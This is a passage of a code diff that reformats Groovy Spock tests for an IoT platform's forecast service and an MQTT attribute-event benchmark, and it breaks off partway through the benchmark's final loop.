-//                new Pair<>(1.0d, LocalDateTime.ofInstant(Instant.ofEpochMilli(timerService.getCurrentTimeMillis() + forecastConfig.getForecastPeriod().toMillis() + offset), ZoneId.systemDefault())),
-//                new Pair<>(2.0d, LocalDateTime.ofInstant(Instant.ofEpochMilli(timerService.getCurrentTimeMillis() + forecastConfig.getForecastPeriod().toMillis() * 2 + offset), ZoneId.systemDefault()))
-//        ])
-//    }
+  // TODO: RT - Not too sure the intention with the offset and seems to be used only in ignored tests so skip for now
+  //    def setupSpec() {
+  //        forecastThing2 = addForecastAsset(assetStorageService, managerTestSetup.realmMasterName, forecastAttributeName, forecastConfig)
+  //        Long offset = ((forecastConfig.getForecastPeriod().toMillis() * 2) / 3) * (-1)
+  //        insertHistoryTestDataToDb(new AttributeRef(forecastThing2.id, forecastAttributeName), forecastHistoricalData, offset, forecastConfig)
+  //
+  //        // Insert forecast test data
+  //        assetPredictedDatapointService.updateValues(forecastThing2.id, forecastAttributeName, [
+  //                new Pair<>(1.0d, LocalDateTime.ofInstant(Instant.ofEpochMilli(timerService.getCurrentTimeMillis() + forecastConfig.getForecastPeriod().toMillis() + offset), ZoneId.systemDefault())),
+  //                new Pair<>(2.0d, LocalDateTime.ofInstant(Instant.ofEpochMilli(timerService.getCurrentTimeMillis() + forecastConfig.getForecastPeriod().toMillis() * 2 + offset), ZoneId.systemDefault()))
+  //        ])
+  //    }
 
-    @Ignore
-    def "Test forecast calculation after server restart - no initial forecast data"() {
-        given: "attribute with forecast configuration"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def attributeRef = new AttributeRef(managerTestSetup.forecastThing1Id, managerTestSetup.forecastAttributeName)
-        def config = managerTestSetup.forecastConfig
+  @Ignore
+  def "Test forecast calculation after server restart - no initial forecast data"() {
+    given: "attribute with forecast configuration"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def attributeRef = new AttributeRef(managerTestSetup.forecastThing1Id, managerTestSetup.forecastAttributeName)
+    def config = managerTestSetup.forecastConfig
 
-        and:
-        stopPseudoClock()
+    and:
+    stopPseudoClock()
 
-        expect: "test datapoints have been added to the database"
-        conditions.eventually {
-            def count = assetDatapointService.getDatapointsCount(attributeRef)
-            assert count == config.pastCount * managerTestSetup.forecastTestHistoryData.size()
-        }
-
-        and: "asset attribute has been registered at the forecast service"
-        conditions.eventually {
-            assert forecastService.forecastTaskManager.containsAttribute(attributeRef)
-        }
-
-        and: "initial forecast values have been calculated"
-        conditions.eventually {
-            List<AssetPredictedDatapoint> predictedDatapoints = assetPredictedDatapointService
-                .getDatapoints(attributeRef)
-                .sort {it.timestamp}
-            assert predictedDatapoints.size() == config.forecastCount
-            for (int i = 0; i < predictedDatapoints.size(); i++) {
-                assert predictedDatapoints[i].value == calculateForecast(managerTestSetup.forecastTestHistoryData[i][0..config.pastCount - 1]).get()
-                assert predictedDatapoints[i].timestamp, closeTo(timerService.currentTimeMillis + (i + 1) * config.forecastPeriod.toMillis(), Duration.ofSeconds(5).toMillis())
-            }
-        }
+    expect: "test datapoints have been added to the database"
+    conditions.eventually {
+      def count = assetDatapointService.getDatapointsCount(attributeRef)
+      assert count == config.pastCount * managerTestSetup.forecastTestHistoryData.size()
     }
 
-    @Ignore
-    def "Test forecast calculation after server restart - forecast data partially available"() {
-        given: "attribute with forecast configuration"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def attributeRef = new AttributeRef(managerTestSetup.forecastThing2Id, managerTestSetup.forecastAttributeName)
-        def config = managerTestSetup.forecastConfig
-
-        and:
-        stopPseudoClock()
-
-        expect: "test datapoints have been added to the database"
-        conditions.eventually {
-            def count = assetDatapointService.getDatapointsCount(attributeRef)
-            assert count == config.pastCount * managerTestSetup.forecastTestHistoryData.size()
-        }
-
-        and: "asset attribute has been registered at the forecast service"
-        conditions.eventually {
-            assert forecastService.forecastTaskManager.containsAttribute(attributeRef)
-        }
-
-        and: "partially existing forecast values should have have been completed and updated"
-        conditions.eventually {
-            List<AssetPredictedDatapoint> predictedDatapoints = assetPredictedDatapointService
-                .getDatapoints(attributeRef)
-                .sort {it.timestamp}
-            assert predictedDatapoints.size() == config.forecastCount
-            Long offset = ((config.forecastPeriod.toMillis() * 2) / 3) * (-1)
-            for (int i = 0; i < predictedDatapoints.size(); i++) {
-                assert predictedDatapoints[i].value == calculateForecast(managerTestSetup.forecastTestHistoryData[i][0..config.pastCount - 1]).get()
-                assert predictedDatapoints[i].timestamp, closeTo(timerService.currentTimeMillis + (i + 1) * config.forecastPeriod.toMillis() + offset, Duration.ofSeconds(10).toMillis())
-            }
-        }
+    and: "asset attribute has been registered at the forecast service"
+    conditions.eventually {
+      assert forecastService.forecastTaskManager.containsAttribute(attributeRef)
     }
 
-    def "Test adding updating and deleting an asset"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
-        assetStorageService = container.getService(AssetStorageService.class)
-        assetDatapointService = container.getService(AssetDatapointService.class)
-        forecastService = container.getService(ForecastService.class)
-        timerService = container.getService(TimerService.class)
+    and: "initial forecast values have been calculated"
+    conditions.eventually {
+      List<AssetPredictedDatapoint> predictedDatapoints = assetPredictedDatapointService
+      .getDatapoints(attributeRef)
+      .sort {it.timestamp}
+      assert predictedDatapoints.size() == config.forecastCount
+      for (int i = 0; i <predictedDatapoints.size(); i++) {
+        assert predictedDatapoints[i].value == calculateForecast(managerTestSetup.forecastTestHistoryData[i][0..config.pastCount - 1]).get()
+        assert predictedDatapoints[i].timestamp, closeTo(timerService.currentTimeMillis + (i + 1) * config.forecastPeriod.toMillis(), Duration.ofSeconds(5).toMillis())
+      }
+    }
+  }
 
-        when: "the system time is stopped and set exactly on the next hour"
-        stopPseudoClock()
-        def now = Instant.ofEpochMilli(timerService.getCurrentTimeMillis())
-        now = now.truncatedTo(ChronoUnit.HOURS).plus(1, ChronoUnit.HOURS)
-        advancePseudoClock(now.toEpochMilli()-timerService.getCurrentTimeMillis(), MILLISECONDS, container)
+  @Ignore
+  def "Test forecast calculation after server restart - forecast data partially available"() {
+    given: "attribute with forecast configuration"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def attributeRef = new AttributeRef(managerTestSetup.forecastThing2Id, managerTestSetup.forecastAttributeName)
+    def config = managerTestSetup.forecastConfig
 
-        and: "forecast asset is added"
-        def forecastThing1 = addForecastAsset(assetStorageService, managerTestSetup.realmMasterName, forecastAttributeName, forecastConfig)
-        def attributeRef = new AttributeRef(forecastThing1.id, forecastAttributeName)
+    and:
+    stopPseudoClock()
 
-        then: "attribute should be registered at the forecast service"
-        conditions.eventually {
-            assert forecastService.forecastTaskManager.containsAttribute(attributeRef)
-        }
-
-        when: "the forecast service is stopped"
-        forecastService.forecastTaskManager.stop(3000)
-
-        and: "historical data is added for the forecast attribute"
-        // Offset historical data by two hours to match up with test intervals
-        insertHistoryTestDataToDb(new AttributeRef(forecastThing1.id, forecastAttributeName), forecastHistoricalData, 2*3600000, forecastConfig)
-
-        and: "time has passed"
-        advancePseudoClock(
-                forecastConfig.forecastPeriod.toMillis(), MILLISECONDS, container
-        )
-
-        and: "the forecast service is started again"
-        forecastService.forecastTaskManager.start(timerService.currentTimeMillis)
-
-        then: "initial forecast values should be calculated"
-        conditions.eventually {
-            List<AssetPredictedDatapoint> predictedDatapoints = assetPredictedDatapointService
-                .getDatapoints(attributeRef)
-                .sort {it.timestamp}
-            assert predictedDatapoints.size() == forecastConfig.forecastCount
-            for (int i = 0; i < predictedDatapoints.size(); i++) {
-                assert predictedDatapoints[i].value == calculateForecast(forecastHistoricalData[i][0..forecastConfig.pastCount - 1]).get()
-                assert predictedDatapoints[i].timestamp == timerService.currentTimeMillis + (i + 1) * forecastConfig.forecastPeriod.toMillis()
-            }
-        }
-
-        when: "new forecast attribute is added"
-        forecastThing1 = assetStorageService.find(forecastThing1.id)
-        forecastThing1.getAttributes().addOrReplace(
-                new Attribute<>("newForecastAttribute", NUMBER)
-                        .addOrReplaceMeta(
-                                new MetaItem<>(
-                                        FORECAST,
-                                        forecastConfig
-                                )
-                        )
-        )
-        forecastThing1 = assetStorageService.merge(forecastThing1)
-        def newAttributeRef = new AttributeRef(forecastThing1.id, "newForecastAttribute")
-
-        then: "new attribute should be registered at the forecast service"
-        conditions.eventually {
-            assert forecastService.forecastTaskManager.containsAttribute(newAttributeRef)
-        }
-
-        when: "forecast configuration is updated"
-        forecastThing1 = assetStorageService.find(forecastThing1.id)
-        def updatedPastCount = forecastConfig.pastCount + 1
-        def updatedConfig = new ForecastConfigurationWeightedExponentialAverage(
-                forecastConfig.pastPeriod, updatedPastCount, forecastConfig.forecastPeriod, forecastConfig.forecastCount
-        )
-        forecastThing1.getAttributes().addOrReplace(
-                new Attribute<>("newForecastAttribute", NUMBER)
-                        .addOrReplaceMeta(
-                                new MetaItem<>(
-                                        FORECAST,
-                                        updatedConfig
-                                )
-                        )
-        )
-        forecastThing1 = assetStorageService.merge(forecastThing1)
-
-        then: "forecast service should contain updated forecast configuration"
-        conditions.eventually {
-            ForecastService.ForecastAttribute forecastAttribute = forecastService.forecastTaskManager.getAttribute(newAttributeRef)
-            assert forecastAttribute != null
-            assert updatedPastCount == (forecastAttribute.config as ForecastConfigurationWeightedExponentialAverage).pastCount
-        }
-
-        when: "forecast configuration is deleted"
-        forecastThing1 = assetStorageService.find(forecastThing1.id)
-        forecastThing1.getAttributes().addOrReplace(
-                new Attribute<>("newForecastAttribute", NUMBER)
-        )
-        forecastThing1 = assetStorageService.merge(forecastThing1)
-
-        then: "attribute should be unregistered from forecast service"
-        conditions.eventually {
-            assert !forecastService.forecastTaskManager.containsAttribute(newAttributeRef)
-        }
-
-        when: "asset is deleted"
-        assetStorageService.delete([forecastThing1.id])
-
-        then: "attribute should be unregistered from forecast service"
-        conditions.eventually {
-            assert !forecastService.forecastTaskManager.containsAttribute(attributeRef)
-        }
+    expect: "test datapoints have been added to the database"
+    conditions.eventually {
+      def count = assetDatapointService.getDatapointsCount(attributeRef)
+      assert count == config.pastCount * managerTestSetup.forecastTestHistoryData.size()
     }
 
-    private Optional<Double> calculateForecast(List<Double> values) {
-        double R = values.size()
-        double a = 2 / (R + 1)
-        return values.stream().reduce((result, periodValue) -> (periodValue * a) + (result * (1 - a)))
+    and: "asset attribute has been registered at the forecast service"
+    conditions.eventually {
+      assert forecastService.forecastTaskManager.containsAttribute(attributeRef)
     }
 
-    protected Asset<?>  addForecastAsset(AssetStorageService assetStorageService, String realm, String attributeName, ForecastConfigurationWeightedExponentialAverage config) {
-        Asset<?> thing = new ThingAsset("Forecast Test Thing")
-        thing.setRealm(realm)
-        thing.getAttributes().addOrReplace(
-                new Attribute<>(attributeName, NUMBER)
-                        .addOrReplaceMeta(
-                                new MetaItem<>(
-                                        FORECAST,
-                                        config
-                                )
-                        )
-        );
-        thing = assetStorageService.merge(thing)
-        return thing
+    and: "partially existing forecast values should have have been completed and updated"
+    conditions.eventually {
+      List<AssetPredictedDatapoint> predictedDatapoints = assetPredictedDatapointService
+      .getDatapoints(attributeRef)
+      .sort {it.timestamp}
+      assert predictedDatapoints.size() == config.forecastCount
+      Long offset = ((config.forecastPeriod.toMillis() * 2) / 3) * (-1)
+      for (int i = 0; i <predictedDatapoints.size(); i++) {
+        assert predictedDatapoints[i].value == calculateForecast(managerTestSetup.forecastTestHistoryData[i][0..config.pastCount - 1]).get()
+        assert predictedDatapoints[i].timestamp, closeTo(timerService.currentTimeMillis + (i + 1) * config.forecastPeriod.toMillis() + offset, Duration.ofSeconds(10).toMillis())
+      }
+    }
+  }
+
+  def "Test adding updating and deleting an asset"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
+    assetStorageService = container.getService(AssetStorageService.class)
+    assetDatapointService = container.getService(AssetDatapointService.class)
+    forecastService = container.getService(ForecastService.class)
+    timerService = container.getService(TimerService.class)
+
+    when: "the system time is stopped and set exactly on the next hour"
+    stopPseudoClock()
+    def now = Instant.ofEpochMilli(timerService.getCurrentTimeMillis())
+    now = now.truncatedTo(ChronoUnit.HOURS).plus(1, ChronoUnit.HOURS)
+    advancePseudoClock(now.toEpochMilli()-timerService.getCurrentTimeMillis(), MILLISECONDS, container)
+
+    and: "forecast asset is added"
+    def forecastThing1 = addForecastAsset(assetStorageService, managerTestSetup.realmMasterName, forecastAttributeName, forecastConfig)
+    def attributeRef = new AttributeRef(forecastThing1.id, forecastAttributeName)
+
+    then: "attribute should be registered at the forecast service"
+    conditions.eventually {
+      assert forecastService.forecastTaskManager.containsAttribute(attributeRef)
     }
 
-    void insertHistoryTestDataToDb(AttributeRef attributeRef, double[][] data, long offsetMillis, ForecastConfigurationWeightedExponentialAverage config) {
-        def values = IntStream.range(0, data.length).mapToObj { hourIndex ->
-            {
-                def hourData = data[hourIndex]
+    when: "the forecast service is stopped"
+    forecastService.forecastTaskManager.stop(3000)
 
-                return IntStream.range(0, config.getPastCount()).mapToObj { periodIndex ->
-                    {
-                        def periodHourValue = hourData[periodIndex]
-                        def timeOffset =
-                                config.getPastPeriod().toMillis() * (config.getPastCount() - periodIndex) - // THE DAY OF THE WEEK
-                                config.getForecastPeriod().toMillis() * hourIndex - // THE HOUR OFFSET
-                                offsetMillis
+    and: "historical data is added for the forecast attribute"
+    // Offset historical data by two hours to match up with test intervals
+    insertHistoryTestDataToDb(new AttributeRef(forecastThing1.id, forecastAttributeName), forecastHistoricalData, 2*3600000, forecastConfig)
 
-                        return new ValueDatapoint<>(
-                            timerService.getCurrentTimeMillis() - timeOffset,
-                            periodHourValue)
-                    }
-                }
-            }
-        }.flatMap{it}.toList()
+    and: "time has passed"
+    advancePseudoClock(
+            forecastConfig.forecastPeriod.toMillis(), MILLISECONDS, container
+            )
 
-        assetDatapointService.upsertValues(attributeRef.getId(), attributeRef.getName(), values)
+    and: "the forecast service is started again"
+    forecastService.forecastTaskManager.start(timerService.currentTimeMillis)
+
+    then: "initial forecast values should be calculated"
+    conditions.eventually {
+      List<AssetPredictedDatapoint> predictedDatapoints = assetPredictedDatapointService
+      .getDatapoints(attributeRef)
+      .sort {it.timestamp}
+      assert predictedDatapoints.size() == forecastConfig.forecastCount
+      for (int i = 0; i <predictedDatapoints.size(); i++) {
+        assert predictedDatapoints[i].value == calculateForecast(forecastHistoricalData[i][0..forecastConfig.pastCount - 1]).get()
+        assert predictedDatapoints[i].timestamp == timerService.currentTimeMillis + (i + 1) * forecastConfig.forecastPeriod.toMillis()
+      }
     }
+
+    when: "new forecast attribute is added"
+    forecastThing1 = assetStorageService.find(forecastThing1.id)
+    forecastThing1.getAttributes().addOrReplace(
+            new Attribute<>("newForecastAttribute", NUMBER)
+            .addOrReplaceMeta(
+                    new MetaItem<>(
+                            FORECAST,
+                            forecastConfig
+                            )
+                    )
+            )
+    forecastThing1 = assetStorageService.merge(forecastThing1)
+    def newAttributeRef = new AttributeRef(forecastThing1.id, "newForecastAttribute")
+
+    then: "new attribute should be registered at the forecast service"
+    conditions.eventually {
+      assert forecastService.forecastTaskManager.containsAttribute(newAttributeRef)
+    }
+
+    when: "forecast configuration is updated"
+    forecastThing1 = assetStorageService.find(forecastThing1.id)
+    def updatedPastCount = forecastConfig.pastCount + 1
+    def updatedConfig = new ForecastConfigurationWeightedExponentialAverage(
+            forecastConfig.pastPeriod, updatedPastCount, forecastConfig.forecastPeriod, forecastConfig.forecastCount
+            )
+    forecastThing1.getAttributes().addOrReplace(
+            new Attribute<>("newForecastAttribute", NUMBER)
+            .addOrReplaceMeta(
+                    new MetaItem<>(
+                            FORECAST,
+                            updatedConfig
+                            )
+                    )
+            )
+    forecastThing1 = assetStorageService.merge(forecastThing1)
+
+    then: "forecast service should contain updated forecast configuration"
+    conditions.eventually {
+      ForecastService.ForecastAttribute forecastAttribute = forecastService.forecastTaskManager.getAttribute(newAttributeRef)
+      assert forecastAttribute != null
+      assert updatedPastCount == (forecastAttribute.config as ForecastConfigurationWeightedExponentialAverage).pastCount
+    }
+
+    when: "forecast configuration is deleted"
+    forecastThing1 = assetStorageService.find(forecastThing1.id)
+    forecastThing1.getAttributes().addOrReplace(
+            new Attribute<>("newForecastAttribute", NUMBER)
+            )
+    forecastThing1 = assetStorageService.merge(forecastThing1)
+
+    then: "attribute should be unregistered from forecast service"
+    conditions.eventually {
+      assert !forecastService.forecastTaskManager.containsAttribute(newAttributeRef)
+    }
+
+    when: "asset is deleted"
+    assetStorageService.delete([forecastThing1.id])
+
+    then: "attribute should be unregistered from forecast service"
+    conditions.eventually {
+      assert !forecastService.forecastTaskManager.containsAttribute(attributeRef)
+    }
+  }
+
+  private Optional<Double> calculateForecast(List<Double> values) {
+    double R = values.size()
+    double a = 2 / (R + 1)
+    return values.stream().reduce((result, periodValue) -> (periodValue * a) + (result * (1 - a)))
+  }
+
+  protected Asset<?> addForecastAsset(AssetStorageService assetStorageService, String realm, String attributeName, ForecastConfigurationWeightedExponentialAverage config) {
+    Asset<?> thing = new ThingAsset("Forecast Test Thing")
+    thing.setRealm(realm)
+    thing.getAttributes().addOrReplace(
+            new Attribute<>(attributeName, NUMBER)
+            .addOrReplaceMeta(
+                    new MetaItem<>(
+                            FORECAST,
+                            config
+                            )
+                    )
+            )
+    thing = assetStorageService.merge(thing)
+    return thing
+  }
+
+  void insertHistoryTestDataToDb(AttributeRef attributeRef, double[][] data, long offsetMillis, ForecastConfigurationWeightedExponentialAverage config) {
+    def values = IntStream.range(0, data.length).mapToObj { hourIndex -> {
+        def hourData = data[hourIndex]
+
+        return IntStream.range(0, config.getPastCount()).mapToObj { periodIndex -> {
+            def periodHourValue = hourData[periodIndex]
+            def timeOffset =
+                    config.getPastPeriod().toMillis() * (config.getPastCount() - periodIndex) - // THE DAY OF THE WEEK
+                    config.getForecastPeriod().toMillis() * hourIndex - // THE HOUR OFFSET
+                    offsetMillis
+
+            return new ValueDatapoint<>(
+                    timerService.getCurrentTimeMillis() - timeOffset,
+                    periodHourValue)
+          }
+        }
+      }
+    }.flatMap{it}.toList()
+
+    assetDatapointService.upsertValues(attributeRef.getId(), attributeRef.getName(), values)
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/benchmark/AttributeEventBenchmarkTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/benchmark/AttributeEventBenchmarkTest.groovy
@@ -56,130 +56,132 @@ import static org.openremote.manager.mqtt.MQTTBrokerService.*
 @Ignore
 class AttributeEventBenchmarkTest extends Specification implements ManagerContainerTrait {
 
-    def "Attribute processing benchmark"() {
+  def "Attribute processing benchmark"() {
 
-        given: "the container environment is started"
-        def eventCount = 1000
-        def startTime = -1l
-        def endTime = -1l
-        List<SharedEvent> receivedEvents = new CopyOnWriteArrayList<>()
-        List<Object> receivedValues = new CopyOnWriteArrayList<>()
-        MQTT_IOClient client = null
-        def conditions = new PollingConditions(timeout: 15, initialDelay: 0.1, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def mqttBrokerService = container.getService(MQTTBrokerService.class)
-        def defaultMQTTHandler = mqttBrokerService.getCustomHandlers().find{it instanceof DefaultMQTTHandler} as DefaultMQTTHandler
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def mqttClientId = UniqueIdentifierGenerator.generateId()
-        def username = keycloakTestSetup.realmBuilding.name + ":" + keycloakTestSetup.serviceUser.username // realm and OAuth client id
-        def password = keycloakTestSetup.serviceUser.secret
-        def mqttHost = getString(container.getConfig(), MQTT_SERVER_LISTEN_HOST, "0.0.0.0")
-        def mqttPort = getInteger(container.getConfig(), MQTT_SERVER_LISTEN_PORT, 1883)
-        def assetIDs = new ArrayList<String>()
-        def assetMultiID = ""
+    given: "the container environment is started"
+    def eventCount = 1000
+    def startTime = -1l
+    def endTime = -1l
+    List<SharedEvent> receivedEvents = new CopyOnWriteArrayList<>()
+    List<Object> receivedValues = new CopyOnWriteArrayList<>()
+    MQTT_IOClient client = null
+    def conditions = new PollingConditions(timeout: 15, initialDelay: 0.1, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def mqttBrokerService = container.getService(MQTTBrokerService.class)
+    def defaultMQTTHandler = mqttBrokerService.getCustomHandlers().find{
+      it instanceof DefaultMQTTHandler
+    } as DefaultMQTTHandler
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def mqttClientId = UniqueIdentifierGenerator.generateId()
+    def username = keycloakTestSetup.realmBuilding.name + ":" + keycloakTestSetup.serviceUser.username // realm and OAuth client id
+    def password = keycloakTestSetup.serviceUser.secret
+    def mqttHost = getString(container.getConfig(), MQTT_SERVER_LISTEN_HOST, "0.0.0.0")
+    def mqttPort = getInteger(container.getConfig(), MQTT_SERVER_LISTEN_PORT, 1883)
+    def assetIDs = new ArrayList<String>()
+    def assetMultiID = ""
 
-        and: "assets are added for testing purposes"
-        for (i in 1..eventCount) {
-            def asset = assetStorageService.merge(new ThingAsset("TestThing$i").setRealm(keycloakTestSetup.realmBuilding.name).addAttributes(
-                    new Attribute<Object>("counter", ValueType.NUMBER)
-            ))
-            assetIDs.add(asset.id)
-        }
-        and: "one asset is added with many attributes"
-        def multiAsset = new ThingAsset("TestThingMulti").setRealm(keycloakTestSetup.realmBuilding.name)
-        for (i in 1..eventCount) {
-            multiAsset.addAttributes(new Attribute<Object>("counter$i", ValueType.NUMBER))
-        }
-        multiAsset = assetStorageService.merge(multiAsset)
-        assetMultiID = multiAsset.id
-
-        when: "a mqtt client connects with valid credentials"
-        client = new MQTT_IOClient(mqttClientId, mqttHost, mqttPort, false, true, new UsernamePassword(username, password), null, null)
-        client.connect()
-
-        then: "mqtt connection should exist"
-        conditions.eventually {
-            assert client.getConnectionStatus() == ConnectionStatus.CONNECTED
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).size() == 1
-        }
-
-        when: "a mqtt client subscribes to all attributes of all assets"
-        def topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$MQTTHandler.TOKEN_MULTI_LEVEL_WILDCARD".toString()
-        Consumer<MQTTMessage<String>> eventConsumer = { msg ->
-            def event = ValueUtil.parse(msg.payload, SharedEvent.class)
-            receivedEvents.add(event.get())
-            if (receivedEvents.size() == eventCount) {
-                endTime = System.currentTimeMillis()
-            }
-        }
-        def subscribed = client.addMessageConsumer(topic, eventConsumer)
-
-        then: "A subscription should exist"
-        assert subscribed
-        assert client.topicConsumerMap.get(topic) != null
-        assert client.topicConsumerMap.get(topic).size() == 1
-        assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).size() == 1
-        def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
-        assert connection != null
-        assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-        assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 1
-
-        when: "Attribute events are sent for each asset by the MQTT client"
-        startTime = System.currentTimeMillis()
-        for (i in 1..eventCount) {
-            topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/counter/${assetIDs.get(i-1)}".toString()
-            def payload = i.toString()
-            client.sendMessage(new MQTTMessage<String>(topic, payload))
-        }
-
-        then: "all attribute updates should be received by the client"
-        new PollingConditions(timeout: 300, initialDelay: 10, delay: 10).eventually {
-            getLOG().info("Events processed = ${receivedEvents.size()}")
-            assert endTime > 0
-        }
-        def processingTime = endTime-startTime
-        getLOG().info("Time taken to process $eventCount events = ${endTime-startTime}ms")
-
-        when: "Attribute events are again sent for each asset by the MQTT client"
-        endTime = 0
-        receivedEvents.clear()
-        startTime = System.currentTimeMillis()
-        for (i in 1..eventCount) {
-            topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/counter/${assetIDs.get(i-1)}".toString()
-            def payload = i.toString()
-            client.sendMessage(new MQTTMessage<String>(topic, payload))
-        }
-
-        then: "all attribute updates should be received by the client in a shorter time due to auth caching"
-        new PollingConditions(timeout: 300, initialDelay: 10, delay: 10).eventually {
-            getLOG().info("Events processed = ${receivedEvents.size()}")
-            assert endTime > 0
-        }
-        assert processingTime > endTime-startTime
-        getLOG().info("Time taken to process $eventCount events (with hot cache) = ${endTime-startTime}ms")
-
-
-        when: "Attribute events are sent for each attribute of the multi asset by the MQTT client"
-        endTime = 0
-        receivedEvents.clear()
-        startTime = System.currentTimeMillis()
-        for (i in 1..eventCount) {
-            topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/counter$i/${assetMultiID}".toString()
-            def payload = i.toString()
-            client.sendMessage(new MQTTMessage<String>(topic, payload))
-        }
-
-        then: "all attribute updates should be received by the client"
-        new PollingConditions(timeout: 300, initialDelay: 10, delay: 10).eventually {
-            getLOG().info("Events processed = ${receivedEvents.size()}")
-            assert endTime > 0
-        }
-        getLOG().info("Time taken to process $eventCount events for multi attribute asset = ${endTime-startTime}ms")
-
-        cleanup: "output processing time"
-        if (client != null) {
-            client.disconnect()
-        }
+    and: "assets are added for testing purposes"
+    for (i in 1..eventCount) {
+      def asset = assetStorageService.merge(new ThingAsset("TestThing$i").setRealm(keycloakTestSetup.realmBuilding.name).addAttributes(
+                      new Attribute<Object>("counter", ValueType.NUMBER)
+                      ))
+      assetIDs.add(asset.id)
     }
+    and: "one asset is added with many attributes"
+    def multiAsset = new ThingAsset("TestThingMulti").setRealm(keycloakTestSetup.realmBuilding.name)
+    for (i in 1..eventCount) {
+      multiAsset.addAttributes(new Attribute<Object>("counter$i", ValueType.NUMBER))
+    }
+    multiAsset = assetStorageService.merge(multiAsset)
+    assetMultiID = multiAsset.id
+
+    when: "a mqtt client connects with valid credentials"
+    client = new MQTT_IOClient(mqttClientId, mqttHost, mqttPort, false, true, new UsernamePassword(username, password), null, null)
+    client.connect()
+
+    then: "mqtt connection should exist"
+    conditions.eventually {
+      assert client.getConnectionStatus() == ConnectionStatus.CONNECTED
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).size() == 1
+    }
+
+    when: "a mqtt client subscribes to all attributes of all assets"
+    def topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$MQTTHandler.TOKEN_MULTI_LEVEL_WILDCARD".toString()
+    Consumer<MQTTMessage<String>> eventConsumer = { msg ->
+      def event = ValueUtil.parse(msg.payload, SharedEvent.class)
+      receivedEvents.add(event.get())
+      if (receivedEvents.size() == eventCount) {
+        endTime = System.currentTimeMillis()
+      }
+    }
+    def subscribed = client.addMessageConsumer(topic, eventConsumer)
+
+    then: "A subscription should exist"
+    assert subscribed
+    assert client.topicConsumerMap.get(topic) != null
+    assert client.topicConsumerMap.get(topic).size() == 1
+    assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).size() == 1
+    def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
+    assert connection != null
+    assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+    assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 1
+
+    when: "Attribute events are sent for each asset by the MQTT client"
+    startTime = System.currentTimeMillis()
+    for (i in 1..eventCount) {
+      topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/counter/${assetIDs.get(i-1)}".toString()
+      def payload = i.toString()
+      client.sendMessage(new MQTTMessage<String>(topic, payload))
+    }
+
+    then: "all attribute updates should be received by the client"
+    new PollingConditions(timeout: 300, initialDelay: 10, delay: 10).eventually {
+      getLOG().info("Events processed = ${receivedEvents.size()}")
+      assert endTime> 0
+    }
+    def processingTime = endTime-startTime
+    getLOG().info("Time taken to process $eventCount events = ${endTime-startTime}ms")
+
+    when: "Attribute events are again sent for each asset by the MQTT client"
+    endTime = 0
+    receivedEvents.clear()
+    startTime = System.currentTimeMillis()
+    for (i in 1..eventCount) {
+      topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/counter/${assetIDs.get(i-1)}".toString()
+      def payload = i.toString()
+      client.sendMessage(new MQTTMessage<String>(topic, payload))
+    }
+
+    then: "all attribute updates should be received by the client in a shorter time due to auth caching"
+    new PollingConditions(timeout: 300, initialDelay: 10, delay: 10).eventually {
+      getLOG().info("Events processed = ${receivedEvents.size()}")
+      assert endTime> 0
+    }
+    assert processingTime> endTime-startTime
+    getLOG().info("Time taken to process $eventCount events (with hot cache) = ${endTime-startTime}ms")
+
+
+    when: "Attribute events are sent for each attribute of the multi asset by the MQTT client"
+    endTime = 0
+    receivedEvents.clear()
+    startTime = System.currentTimeMillis()
+    for (i in 1..eventCount) {
